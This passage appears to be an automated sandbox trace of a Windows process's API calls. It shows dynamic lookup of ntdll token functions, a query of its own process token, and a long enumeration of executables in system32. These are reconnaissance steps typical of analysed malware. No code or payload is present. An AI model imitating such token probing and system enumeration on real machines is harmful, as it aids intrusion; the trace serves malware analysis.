	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0071.011] GetProcAddress (hModule=0x77960000, lpProcName="ZwOpenProcessToken") returned 0x779d7e10
	[0071.011] NtOpenProcessToken (in: ProcessHandle=0x194, DesiredAccess=0x8, TokenHandle=0x203fcc4 | out: TokenHandle=0x203fcc4*=0x18c) returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.011] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] GetLastError () returned 0x0
	[0071.012] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0071.012] GetProcAddress (hModule=0x77960000, lpProcName="ZwQueryInformationToken") returned 0x779d6eb0
	[0071.012] NtQueryInformationToken (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x203fd34 | out: TokenInformation=0x0, ReturnLength=0x203fd34) returned 0xc0000023
	[0071.013] NtQueryInformationToken (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x4d0190, TokenInformationLength=0x24, ReturnLength=0x203fd34 | out: TokenInformation=0x4d0190, ReturnLength=0x203fd34) returned 0x0
	[0071.013] CloseHandle (hObject=0x18c) returned 1
	[0071.013] CloseHandle (hObject=0x194) returned 1
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetLastError () returned 0x0
	[0071.013] GetSystemDirectoryW (in: lpBuffer=0x4d3020, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0071.014] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0071.014] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 0x4cdb08
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.014] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.015] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.016] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.017] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] StrRChrW (lpStart="PATHPING.EXE", lpEnd=0x0, wMatch=0x2e) returned=".EXE"
